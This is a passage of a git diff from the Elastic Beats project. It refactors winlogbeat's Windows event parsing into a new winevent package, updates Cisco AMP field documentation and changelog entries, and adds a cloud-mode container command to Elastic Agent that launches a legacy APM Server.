diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 6ee08bd58e4..50630ce51e9 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -372,6 +372,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix netflow module ignoring detect_sequence_reset flag. {issue}24268[24268] {pull}24270[24270] - Fix Cisco ASA parser for message 722051. {pull}24410[24410] - Fix `google_workspace` pagination. {pull}24668[24668] +- Fix Cisco ASA parser for message 302022. {issue}24405[24405] {pull}24697[24697] *Heartbeat* @@ -798,6 +799,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Mark m365 defender, defender atp, okta and google workspace modules as GA {pull}23113[23113] - Added `alternative_host` option to google pubsub input {pull}23215[23215] - Support X-Forwarder-For in IIS logs. {pull}19142[192142] +- Updating field mappings for Cisco AMP module, fixing certain fields. {pull}24661[24661] - Added NTP fileset to Zeek module {pull}24224[24224] *Heartbeat* diff --git a/filebeat/docs/fields.asciidoc b/filebeat/docs/fields.asciidoc index 8cf67e5df44..2ed4bccb4f5 100644 --- a/filebeat/docs/fields.asciidoc +++ b/filebeat/docs/fields.asciidoc @@ -21198,7 +21198,7 @@ type: keyword -- -*`cisco.amp.file.archived_file.identify.sha256`*:: +*`cisco.amp.file.archived_file.identity.sha256`*:: + -- SHA256 hash of the archived file related to the malicious event. @@ -21408,12 +21408,52 @@ type: flattened -- +*`cisco.amp.mitre_tactics`*:: ++ +-- +Array of all related mitre tactic ID's + + +type: keyword + +-- + *`cisco.amp.techniques`*:: + -- List of all MITRE techniques related to the incident found. +type: flattened + +-- + +*`cisco.amp.mitre_techniques`*:: ++ +-- +Array of all related mitre technique ID's + + +type: keyword + +-- + +*`cisco.amp.command_line.arguments`*:: ++ +-- +The CLI arguments related to the Cloud Threat IOC reported by Cisco. + + +type: keyword + +-- + +*`cisco.amp.bp_data`*:: ++ +-- +Endpoint isolation information + + type: flattened -- diff --git a/libbeat/processors/translate_sid/translatesid.go b/libbeat/processors/translate_sid/translatesid.go index f794019d78e..5a7cfcf5fb7 100644 --- a/libbeat/processors/translate_sid/translatesid.go +++ b/libbeat/processors/translate_sid/translatesid.go @@ -32,7 +32,7 @@ import ( "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/libbeat/processors" jsprocessor "github.com/elastic/beats/v7/libbeat/processors/script/javascript/module/processor" - "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) const logName = "processor.translate_sid" @@ -117,7 +117,7 @@ func (p *processor) translateSID(event *beat.Event) error { } } if p.AccountTypeTarget != "" { - if _, err = event.PutValue(p.AccountTypeTarget, sys.SIDType(accountType).String()); err != nil { + if _, err = event.PutValue(p.AccountTypeTarget, winevent.SIDType(accountType).String()); err != nil { errs = append(errs, err) } } diff --git a/libbeat/processors/translate_sid/translatesid_test.go b/libbeat/processors/translate_sid/translatesid_test.go index 529f90b065f..bd9ba9e1404 100644 --- a/libbeat/processors/translate_sid/translatesid_test.go +++ b/libbeat/processors/translate_sid/translatesid_test.go @@ -29,21 +29,21 @@ import ( "golang.org/x/sys/windows" "github.com/elastic/beats/v7/libbeat/beat" - "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) func TestTranslateSID(t *testing.T) { var tests = []struct { SID string Account string - AccountType sys.SIDType + AccountType winevent.SIDType Domain string Assert func(*testing.T, *beat.Event, error) }{ {SID: "S-1-5-7", Domain: "NT AUTHORITY", Account: "ANONYMOUS LOGON"}, {SID: "S-1-0-0", Account: "NULL SID"}, {SID: "S-1-1-0", Account: "Everyone"}, - {SID: "S-1-5-32-544", Domain: "BUILTIN", Account: "Administrators", AccountType: sys.SidTypeAlias}, + {SID: "S-1-5-32-544", Domain: "BUILTIN", Account: "Administrators", AccountType: winevent.SidTypeAlias}, {SID: "S-1-5-113", Domain: "NT AUTHORITY", Account: "Local Account"}, {SID: "", Assert: assertInvalidSID}, {SID: "Not a SID", Assert: assertInvalidSID}, diff --git a/winlogbeat/eventlog/eventlog.go b/winlogbeat/eventlog/eventlog.go index 9302417be2e..1d40655c9ba 100644 --- a/winlogbeat/eventlog/eventlog.go +++ b/winlogbeat/eventlog/eventlog.go @@ -19,19 +19,15 @@ package eventlog import ( "expvar" - "fmt" - "reflect" "strconv" - "strings" "syscall" "time" "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/common" "github.com/elastic/beats/v7/libbeat/logp" - "github.com/elastic/beats/v7/winlogbeat/checkpoint" - "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) // Debug selectors used in this package. @@ -55,12 +51,6 @@ var ( readErrors = expvar.NewMap("read_errors") ) -// Keyword Constants -const ( - keywordAuditFailure = 0x10000000000000 - keywordAuditSuccess = 0x20000000000000 -) - // EventLog is an interface to a Windows Event Log. type EventLog interface { // Open the event log. state points to the last successfully read event @@ -81,7 +71,7 @@ type EventLog interface { // Record represents a single event from the log. type Record struct { - sys.Event + winevent.Event File string // Source file when event is from a file. API string // The event log API type used to read the record. XML string // XML representation of the event. @@ -90,78 +80,32 @@ type Record struct { // ToEvent returns a new beat.Event containing the data from this Record. func (e Record) ToEvent() beat.Event { - // Windows Log Specific data - win := common.MapStr{ - "channel": e.Channel, - "event_id": e.EventIdentifier.ID, - "provider_name": e.Provider.Name, - "record_id": e.RecordID, - "task": e.Task, - "api": e.API, - } - addOptional(win, "computer_name", e.Computer) - addOptional(win, "kernel_time", e.Execution.KernelTime) - addOptional(win, "keywords", e.Keywords) - addOptional(win, "opcode", e.Opcode) - addOptional(win, "processor_id", e.Execution.ProcessorID) - addOptional(win, "processor_time", e.Execution.ProcessorTime) - addOptional(win, "provider_guid", e.Provider.GUID) - addOptional(win, "session_id", e.Execution.SessionID) - addOptional(win, "task", e.Task) - addOptional(win, "user_time", e.Execution.UserTime) - addOptional(win, "version", e.Version) - // Correlation - addOptional(win, "activity_id", e.Correlation.ActivityID) - addOptional(win, "related_activity_id", e.Correlation.RelatedActivityID) - // Execution - addOptional(win, "process.pid", e.Execution.ProcessID) - addOptional(win, "process.thread.id", e.Execution.ThreadID) - - if e.User.Identifier != "" { - user := common.MapStr{ - "identifier": e.User.Identifier, - } - win["user"] = user - addOptional(user, "name", e.User.Name) - addOptional(user, "domain", e.User.Domain) - addOptional(user, "type", e.User.Type.String()) - } + win := e.Fields() - addPairs(win, "event_data", e.EventData.Pairs) - userData := addPairs(win, "user_data", e.UserData.Pairs) - addOptional(userData, "xml_name", e.UserData.Name.Local) + win.Delete("keywords_raw") + win.Put("api", e.API) m := common.MapStr{ "winlog": win, } // ECS data + m.Put("event.created", time.Now()) + m.Put("event.kind", "event") m.Put("event.code", e.EventIdentifier.ID) m.Put("event.provider", e.Provider.Name) - addOptional(m, "event.action", e.Task) - addOptional(m, "host.name", e.Computer) - - m.Put("event.created", time.Now()) - if e.KeywordsRaw&keywordAuditFailure > 0 { - m.Put("event.outcome", "failure") - } else if e.KeywordsRaw&keywordAuditSuccess > 0 { - m.Put("event.outcome", "success") - } - - addOptional(m, "log.file.path", e.File) - addOptional(m, "log.level", strings.ToLower(e.Level)) - addOptional(m, "message", sys.RemoveWindowsLineEndings(e.Message)) - // Errors - addOptional(m, "error.code", e.RenderErrorCode) - if len(e.RenderErr) == 1 { - addOptional(m, "error.message", e.RenderErr[0]) - } else { - addOptional(m, "error.message", e.RenderErr) - } + rename(m, "winlog.outcome", "event.outcome") + rename(m, "winlog.level", "log.level") + rename(m, "winlog.message", "message") + rename(m, "winlog.error.code", "error.code") + rename(m, "winlog.error.message", "error.message") - addOptional(m, "event.original", e.XML) + winevent.AddOptional(m, "log.file.path", e.File) + winevent.AddOptional(m, "event.original", e.XML) + winevent.AddOptional(m, "event.action", e.Task) + winevent.AddOptional(m, "host.name", e.Computer) return beat.Event{ Timestamp: e.TimeCreated.SystemTime, @@ -170,76 +114,14 @@ func (e Record) ToEvent() beat.Event { } } -// addOptional adds a key and value to the given MapStr if the value is not the -// zero value for the type of v. It is safe to call the function with a nil -// MapStr. -func addOptional(m common.MapStr, key string, v interface{}) { - if m != nil && !isZero(v) { - m.Put(key, v) - } -} - -// addPairs adds a new dictionary to the given MapStr. The key/value pairs are -// added to the new dictionary. If any keys are duplicates, the first key/value -// pair is added and the remaining duplicates are dropped. -// -// The new dictionary is added to the given MapStr and it is also returned for -// convenience purposes. -func addPairs(m common.MapStr, key string, pairs []sys.KeyValue) common.MapStr { - if len(pairs) == 0 { - return nil - } - - h := make(common.MapStr, len(pairs)) - for i, kv := range pairs { - // Ignore empty values. - if kv.Value == "" { - continue - } - - // If the key name is empty or if it the default of "Data" then - // assign a generic name of paramN. - k := kv.Key - if k == "" || k == "Data" { - k = fmt.Sprintf("param%d", i+1) - } - - // Do not overwrite. - _, exists := h[k] - if !exists { - h[k] = sys.RemoveWindowsLineEndings(kv.Value) - } else { - debugf("Dropping key/value (k=%s, v=%s) pair because key already "+ - "exists. event=%+v", k, kv.Value, m) - } - } - - if len(h) == 0 { - return nil - } - - m[key] = h - return h -} - -// isZero return true if the given value is the zero value for its type. -func isZero(i interface{}) bool { - v := reflect.ValueOf(i) - switch v.Kind() { - case reflect.Array, reflect.String: - return v.Len() == 0 - case reflect.Bool: - return !v.Bool() - case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: - return v.Int() == 0 - case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: - return v.Uint() == 0 - case reflect.Float32, reflect.Float64: - return v.Float() == 0 - case reflect.Interface, reflect.Map, reflect.Ptr, reflect.Slice: - return v.IsNil() +// rename will rename a map entry overriding any previous value +func rename(m common.MapStr, oldKey, newKey string) { + v, err := m.GetValue(oldKey) + if err != nil { + return } - return false + m.Put(newKey, v) + m.Delete(oldKey) } // incrementMetric increments a value in the specified expvar.Map. The key diff --git a/winlogbeat/eventlog/wineventlog.go b/winlogbeat/eventlog/wineventlog.go index 9f832aac0af..6c9ded37c40 100644 --- a/winlogbeat/eventlog/wineventlog.go +++ b/winlogbeat/eventlog/wineventlog.go @@ -36,6 +36,7 @@ import ( "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/winlogbeat/checkpoint" "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" win "github.com/elastic/beats/v7/winlogbeat/sys/wineventlog" ) @@ -317,14 +318,14 @@ func (l *winEventLog) eventHandles(maxRead int) ([]win.EvtHandle, int, error) { func (l *winEventLog) buildRecordFromXML(x []byte, recoveredErr error) (Record, error) { includeXML := l.config.IncludeXML - e, err := sys.UnmarshalEventXML(x) + e, err := winevent.UnmarshalXML(x) if err != nil { e.RenderErr = append(e.RenderErr, err.Error()) // Add raw XML to event.original when decoding fails includeXML = true } - err = sys.PopulateAccount(&e.User) + err = winevent.PopulateAccount(&e.User) if err != nil { debugf("%s SID %s account lookup failed. %v", l.logPrefix, e.User.Identifier, err) diff --git a/winlogbeat/sys/event.go b/winlogbeat/sys/winevent/event.go similarity index 72% rename from winlogbeat/sys/event.go rename to winlogbeat/sys/winevent/event.go index 6294d75f1a8..0abec5bbb5e 100644 --- a/winlogbeat/sys/event.go +++ b/winlogbeat/sys/winevent/event.go @@ -15,19 +15,39 @@ // specific language governing permissions and limitations // under the License. -package sys +package winevent import ( "encoding/xml" "fmt" "strconv" + "strings" "time" + "github.com/elastic/beats/v7/libbeat/common" libxml "github.com/elastic/beats/v7/libbeat/common/encoding/xml" + "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/winlogbeat/sys" ) -// UnmarshalEventXML unmarshals the given XML into a new Event. -func UnmarshalEventXML(rawXML []byte) (Event, error) { +// Debug selectors used in this package. +const ( + debugSelector = "winevent" +) + +// Debug logging functions for this package. +var ( + debugf = logp.MakeDebug(debugSelector) +) + +// Keyword Constants +const ( + keywordAuditFailure = 0x10000000000000 + keywordAuditSuccess = 0x20000000000000 +) + +// UnmarshalXML unmarshals the given XML into a new Event. +func UnmarshalXML(rawXML []byte) (Event, error) { var event Event decoder := xml.NewDecoder(libxml.NewSafeReader(rawXML)) err := decoder.Decode(&event) @@ -68,6 +88,70 @@ type Event struct { RenderErr []string } +func (e Event) Fields() common.MapStr { + // Windows Log Specific data + win := common.MapStr{} + + AddOptional(win, "channel", e.Channel) + AddOptional(win, "event_id", e.EventIdentifier.ID) + AddOptional(win, "provider_name", e.Provider.Name) + AddOptional(win, "record_id", e.RecordID) + AddOptional(win, "task", e.Task) + AddOptional(win, "keywords_raw", e.KeywordsRaw) + AddOptional(win, "computer_name", e.Computer) + AddOptional(win, "keywords", e.Keywords) + AddOptional(win, "opcode", e.Opcode) + AddOptional(win, "provider_guid", e.Provider.GUID) + AddOptional(win, "task", e.Task) + AddOptional(win, "version", e.Version) + + if e.KeywordsRaw&keywordAuditFailure > 0 { + _, _ = win.Put("outcome", "failure") + } else if e.KeywordsRaw&keywordAuditSuccess > 0 { + _, _ = win.Put("outcome", "success") + } + + AddOptional(win, "level", strings.ToLower(e.Level)) + AddOptional(win, "message", sys.RemoveWindowsLineEndings(e.Message)) + + if e.User.Identifier != "" { + user := common.MapStr{ + "identifier": e.User.Identifier, + } + win["user"] = user + AddOptional(user, "domain", e.User.Domain) + AddOptional(user, "name", e.User.Name) + AddOptional(user, "type", e.User.Type.String()) + } + + AddPairs(win, "event_data", e.EventData.Pairs) + userData := AddPairs(win, "user_data", e.UserData.Pairs) + AddOptional(userData, "xml_name", e.UserData.Name.Local) + + // Correlation + AddOptional(win, "activity_id", e.Correlation.ActivityID) + AddOptional(win, "related_activity_id", e.Correlation.RelatedActivityID) + + // Execution + AddOptional(win, "kernel_time", e.Execution.KernelTime) + AddOptional(win, "process.pid", e.Execution.ProcessID) + AddOptional(win, "process.thread.id", e.Execution.ThreadID) + AddOptional(win, "processor_id", e.Execution.ProcessorID) + AddOptional(win, "processor_time", e.Execution.ProcessorTime) + AddOptional(win, "session_id", e.Execution.SessionID) + AddOptional(win, "user_time", e.Execution.UserTime) + + // Errors + AddOptional(win, "error.code", e.RenderErrorCode) + if len(e.RenderErr) == 1 { + AddOptional(win, "error.message", e.RenderErr[0]) + } else { + AddOptional(win, "error.message", e.RenderErr) + } + + return win +} + // Provider identifies the provider that logged the event. The Name and GUID // attributes are included if the provider used an instrumentation manifest to // define its events; otherwise, the EventSourceName attribute is included if a diff --git a/winlogbeat/sys/event_test.go b/winlogbeat/sys/winevent/event_test.go similarity index 97% rename from winlogbeat/sys/event_test.go rename to winlogbeat/sys/winevent/event_test.go index d4a4d2a564d..4ed391b91be 100644 --- a/winlogbeat/sys/event_test.go +++ b/winlogbeat/sys/winevent/event_test.go @@ -15,7 +15,7 @@ // specific language governing permissions and limitations // under the License. -package sys +package winevent import ( "encoding/json" @@ -154,7 +154,7 @@ func TestXML(t *testing.T) { } for _, test := range tests { - event, err := UnmarshalEventXML([]byte(test.xml)) + event, err := UnmarshalXML([]byte(test.xml)) if err != nil { t.Error(err) continue @@ -175,7 +175,7 @@ func TestXML(t *testing.T) { // when the event is decoded. func TestInvalidXML(t *testing.T) { evXML := strings.Replace(allXML, "%1", "\t \n\x1b", -1) - ev, err := UnmarshalEventXML([]byte(evXML)) + ev, err := UnmarshalXML([]byte(evXML)) assert.Equal(t, nil, err) assert.Equal(t, "Creating WSMan shell on server with ResourceUri: \t\r\n\\u001b", ev.Message) } @@ -236,14 +236,14 @@ const nonUnsignedIntVersion = ` // // Reference: https://docs.microsoft.com/en-us/windows/win32/wes/schema-version-systempropertiestype-element func TestInvalidVersion(t *testing.T) { - ev, err := UnmarshalEventXML([]byte(nonUnsignedIntVersion)) + ev, err := UnmarshalXML([]byte(nonUnsignedIntVersion)) assert.NoError(t, err) assert.EqualValues(t, 0, ev.Version) } func BenchmarkXMLUnmarshal(b *testing.B) { for i := 0; i < b.N; i++ { - _, err := UnmarshalEventXML([]byte(allXML)) + _, err := UnmarshalXML([]byte(allXML)) if err != nil { b.Fatal(err) } diff --git a/winlogbeat/sys/winevent/maputil.go b/winlogbeat/sys/winevent/maputil.go new file mode 100644 index 00000000000..41fe694c88e --- /dev/null +++ b/winlogbeat/sys/winevent/maputil.go @@ -0,0 +1,99 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package winevent + +import ( + "fmt" + "reflect" + + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/winlogbeat/sys" +) + +// AddOptional adds a key and value to the given MapStr if the value is not the +// zero value for the type of v. It is safe to call the function with a nil +// MapStr. +func AddOptional(m common.MapStr, key string, v interface{}) { + if m != nil && !isZero(v) { + _, _ = m.Put(key, v) + } +} + +// AddPairs adds a new dictionary to the given MapStr. The key/value pairs are +// added to the new dictionary. If any keys are duplicates, the first key/value +// pair is added and the remaining duplicates are dropped. +// +// The new dictionary is added to the given MapStr and it is also returned for +// convenience purposes. +func AddPairs(m common.MapStr, key string, pairs []KeyValue) common.MapStr { + if len(pairs) == 0 { + return nil + } + + h := make(common.MapStr, len(pairs)) + for i, kv := range pairs { + // Ignore empty values. + if kv.Value == "" { + continue + } + + // If the key name is empty or if it the default of "Data" then + // assign a generic name of paramN. + k := kv.Key + if k == "" || k == "Data" { + k = fmt.Sprintf("param%d", i+1) + } + + // Do not overwrite. + _, err := h.GetValue(k) + if err == common.ErrKeyNotFound { + _, _ = h.Put(k, sys.RemoveWindowsLineEndings(kv.Value)) + } else { + debugf("Dropping key/value (k=%s, v=%s) pair because key already "+ + "exists. event=%+v", k, kv.Value, m) + } + } + + if len(h) == 0 { + return nil + } + + _, _ = m.Put(key, h) + + return h +} + +// isZero return true if the given value is the zero value for its type. +func isZero(i interface{}) bool { + v := reflect.ValueOf(i) + switch v.Kind() { + case reflect.Array, reflect.String: + return v.Len() == 0 + case reflect.Bool: + return !v.Bool() + case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: + return v.Int() == 0 + case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: + return v.Uint() == 0 + case reflect.Float32, reflect.Float64: + return v.Float() == 0 + case reflect.Interface, reflect.Map, reflect.Ptr, reflect.Slice: + return v.IsNil() + } + return false +} diff --git a/winlogbeat/sys/sid.go b/winlogbeat/sys/winevent/sid.go similarity index 99% rename from winlogbeat/sys/sid.go rename to winlogbeat/sys/winevent/sid.go index 1f09c1b8f8f..9c162f189e5 100644 --- a/winlogbeat/sys/sid.go +++ b/winlogbeat/sys/winevent/sid.go @@ -15,7 +15,7 @@ // specific language governing permissions and limitations // under the License. -package sys +package winevent import ( "fmt" diff --git a/winlogbeat/sys/sid_test.go b/winlogbeat/sys/winevent/sid_test.go similarity index 98% rename from winlogbeat/sys/sid_test.go rename to winlogbeat/sys/winevent/sid_test.go index ec984f1b05f..aced1a3921a 100644 --- a/winlogbeat/sys/sid_test.go +++ b/winlogbeat/sys/winevent/sid_test.go @@ -17,7 +17,7 @@ // +build !integration -package sys +package winevent import ( "testing" diff --git a/winlogbeat/sys/sid_windows.go b/winlogbeat/sys/winevent/sid_windows.go similarity index 98% rename from winlogbeat/sys/sid_windows.go rename to winlogbeat/sys/winevent/sid_windows.go index 23fb3f04879..001782556fa 100644 --- a/winlogbeat/sys/sid_windows.go +++ b/winlogbeat/sys/winevent/sid_windows.go @@ -15,7 +15,7 @@ // specific language governing permissions and limitations // under the License. -package sys +package winevent import "golang.org/x/sys/windows" diff --git a/winlogbeat/sys/wineventlog/metadata_store.go b/winlogbeat/sys/wineventlog/metadata_store.go index e59294f6276..fe94c03e168 100644 --- a/winlogbeat/sys/wineventlog/metadata_store.go +++ b/winlogbeat/sys/wineventlog/metadata_store.go @@ -30,6 +30,7 @@ import ( "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) var ( @@ -295,7 +296,7 @@ func newEventMetadataFromEventHandle(publisher *PublisherMetadata, eventHandle E // By parsing the XML we can get the names of the parameters even if the // publisher metadata is unavailable or is out of sync with the events. - event, err := sys.UnmarshalEventXML([]byte(xml)) + event, err := winevent.UnmarshalXML([]byte(xml)) if err != nil { return nil, errors.Wrap(err, "failed to unmarshal XML") } diff --git a/winlogbeat/sys/wineventlog/renderer.go b/winlogbeat/sys/wineventlog/renderer.go index 2d7c4e47b53..d52f4399fa2 100644 --- a/winlogbeat/sys/wineventlog/renderer.go +++ b/winlogbeat/sys/wineventlog/renderer.go @@ -35,6 +35,7 @@ import ( "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) const ( @@ -93,8 +94,8 @@ func (r *Renderer) Close() error { } // Render renders the event handle into an Event. -func (r *Renderer) Render(handle EvtHandle) (*sys.Event, error) { - event := &sys.Event{} +func (r *Renderer) Render(handle EvtHandle) (*winevent.Event, error) { + event := &winevent.Event{} if err := r.renderSystem(handle, event); err != nil { return nil, errors.Wrap(err, "failed to render system properties") @@ -175,7 +176,7 @@ func (r *Renderer) getPublisherMetadata(publisher string) (*publisherMetadataSto } // renderSystem writes all the system context properties into the event. -func (r *Renderer) renderSystem(handle EvtHandle, event *sys.Event) error { +func (r *Renderer) renderSystem(handle EvtHandle, event *winevent.Event) error { bb, propertyCount, err := r.render(r.systemContext, handle) if err != nil { return errors.Wrap(err, "failed to get system values") @@ -208,7 +209,7 @@ func (r *Renderer) renderSystem(handle EvtHandle, event *sys.Event) error { case EvtSystemOpcode: event.OpcodeRaw = data.(uint8) case EvtSystemKeywords: - event.KeywordsRaw = sys.HexInt64(data.(hexInt64)) + event.KeywordsRaw = winevent.HexInt64(data.(hexInt64)) case EvtSystemTimeCreated: event.TimeCreated.SystemTime = data.(time.Time) case EvtSystemEventRecordId: @@ -230,9 +231,9 @@ func (r *Renderer) renderSystem(handle EvtHandle, event *sys.Event) error { event.User.Identifier = sid.String() var accountType uint32 event.User.Name, event.User.Domain, accountType, _ = sid.LookupAccount("") - event.User.Type = sys.SIDType(accountType) + event.User.Type = winevent.SIDType(accountType) case EvtSystemVersion: - event.Version = sys.Version(data.(uint8)) + event.Version = winevent.Version(data.(uint8)) } } @@ -242,7 +243,7 @@ func (r *Renderer) renderSystem(handle EvtHandle, event *sys.Event) error { // renderUser returns the event/user data values. This does not provide the // parameter names. It computes a fingerprint of the values types to help the // caller match the correct names to the returned values. -func (r *Renderer) renderUser(handle EvtHandle, event *sys.Event) (values []interface{}, fingerprint uint64, err error) { +func (r *Renderer) renderUser(handle EvtHandle, event *winevent.Event) (values []interface{}, fingerprint uint64, err error) { bb, propertyCount, err := r.render(r.userContext, handle) if err != nil { return nil, 0, errors.Wrap(err, "failed to get user values") @@ -306,7 +307,7 @@ func (r *Renderer) render(context EvtHandle, eventHandle EvtHandle) (*sys.Pooled } // addEventData adds the event/user data values to the event. -func (r *Renderer) addEventData(evtMeta *eventMetadata, values []interface{}, event *sys.Event) { +func (r *Renderer) addEventData(evtMeta *eventMetadata, values []interface{}, event *winevent.Event) { if len(values) == 0 { return } @@ -350,7 +351,7 @@ func (r *Renderer) addEventData(evtMeta *eventMetadata, values []interface{}, ev strVal = fmt.Sprintf("%v", v) } - event.EventData.Pairs = append(event.EventData.Pairs, sys.KeyValue{ + event.EventData.Pairs = append(event.EventData.Pairs, winevent.KeyValue{ Key: paramName(i), Value: strVal, }) @@ -397,7 +398,7 @@ func (r *Renderer) formatMessageFromTemplate(msgTmpl *template.Template, values // enrichRawValuesWithNames adds the names associated with the raw system // property values. It enriches the event with keywords, opcode, level, and // task. The search order is defined in the EvtFormatMessage documentation. -func enrichRawValuesWithNames(publisherMeta *publisherMetadataStore, event *sys.Event) { +func enrichRawValuesWithNames(publisherMeta *publisherMetadataStore, event *winevent.Event) { // Keywords. Each bit in the value can represent a keyword. rawKeyword := int64(event.KeywordsRaw) isClassic := keywordClassic&rawKeyword > 0 diff --git a/winlogbeat/sys/wineventlog/renderer_test.go b/winlogbeat/sys/wineventlog/renderer_test.go index c030686e9ad..4b75ff71168 100644 --- a/winlogbeat/sys/wineventlog/renderer_test.go +++ b/winlogbeat/sys/wineventlog/renderer_test.go @@ -36,7 +36,7 @@ import ( "github.com/elastic/beats/v7/libbeat/common/atomic" "github.com/elastic/beats/v7/libbeat/logp" - "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) func TestRenderer(t *testing.T) { @@ -166,10 +166,10 @@ func TestTemplateFunc(t *testing.T) { } // renderAllEvents reads all events and renders them. -func renderAllEvents(t *testing.T, log EvtHandle, renderer *Renderer, ignoreMissingMetadataError bool) []*sys.Event { +func renderAllEvents(t *testing.T, log EvtHandle, renderer *Renderer, ignoreMissingMetadataError bool) []*winevent.Event { t.Helper() - var events []*sys.Event + var events []*winevent.Event for { h, done := nextHandle(t, log) if done { diff --git a/x-pack/elastic-agent/magefile.go b/x-pack/elastic-agent/magefile.go index 2585b7269f2..0ece510c183 100644 --- a/x-pack/elastic-agent/magefile.go +++ b/x-pack/elastic-agent/magefile.go @@ -326,6 +326,9 @@ func Package() { func requiredPackagesPresent(basePath, beat, version string, requiredPackages []string) bool { for _, pkg := range requiredPackages { + if _, ok := os.LookupEnv(snapshotEnv); ok { + version += "-SNAPSHOT" + } packageName := fmt.Sprintf("%s-%s-%s", beat, version, pkg) path := filepath.Join(basePath, "build", "distributions", packageName) diff --git a/x-pack/elastic-agent/pkg/agent/cmd/container.go b/x-pack/elastic-agent/pkg/agent/cmd/container.go index fdbbaa213a4..6e66565353e 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/container.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/container.go @@ -6,14 +6,18 @@ package cmd import ( "bytes" + "context" "encoding/json" "fmt" "io" "net/url" "os" "os/exec" + "path/filepath" "regexp" "strings" + "sync" + "syscall" "time" "github.com/spf13/cobra" @@ -23,16 +27,17 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/artifact" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/artifact/install/tar" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/process" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) const ( - defaultKibanaHost = "http://kibana:5601" - defaultESHost = "http://elasticsearch:9200" - defaultUsername = "elastic" - defaultPassword = "changeme" - defaultTokenName = "Default" - requestRetrySleep = 1 * time.Second // sleep 1 sec between retries for HTTP requests maxRequestRetries = 30 // maximum number of retries for HTTP requests ) @@ -44,7 +49,7 @@ var ( ) func newContainerCommand(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { - return &cobra.Command{ + cmd := cobra.Command{ Hidden: true, // not exposed over help; used by container entrypoint only Use: "container", Short: "Bootstrap Elastic Agent to run inside of a container", @@ -112,15 +117,97 @@ all the above actions will be skipped, because the Elastic Agent has already bee occurs on every start of the container set FLEET_FORCE to 1. `, Run: func(c *cobra.Command, args []string) { - if err := containerCmd(streams, c, flags, args); err != nil { - fmt.Fprintf(streams.Err, "Error: %v\n", err) + var err error + if _, cloud := os.LookupEnv("ELASTIC_AGENT_CLOUD"); cloud { + err = containerCloudCmd(streams, c, flags, args) + } else { + err = containerCmd(streams, c, flags, defaultAccessConfig()) + } + if err != nil { + logError(streams, err) os.Exit(1) } }, } + return &cmd +} + +func logError(streams *cli.IOStreams, err error) { + fmt.Fprintf(streams.Err, "Error: %v\n", err) } -func containerCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args []string) error { +func logInfo(streams *cli.IOStreams, msg string) { + fmt.Fprintln(streams.Out, msg) +} + +func containerCloudCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args []string) error { + logInfo(streams, "Elastic Agent container in cloud mode") + // sync main process and apm-server legacy process + var wg sync.WaitGroup + wg.Add(1) // main process (always running) + mainProc, err := os.FindProcess(os.Getpid()) + if err != nil { + return errors.New(err, "finding current process") + } + var apmProc *process.Info + // run legacy APM Server as a daemon; send termination signal + // to the main process if the daemon is stopped + apmPath := os.Getenv("APM_SERVER_PATH") + if apmPath != "" { + apmProc, err = runLegacyAPMServer(streams, apmPath, args) + if err != nil { + return errors.New(err, "starting legacy apm-server") + } + logInfo(streams, "Legacy apm-server daemon started.") + wg.Add(1) // apm-server legacy process + go func() { + if err := func() error { + apmProcState, err := apmProc.Process.Wait() + if err != nil { + return err + } + if apmProcState.ExitCode() != 0 { + return 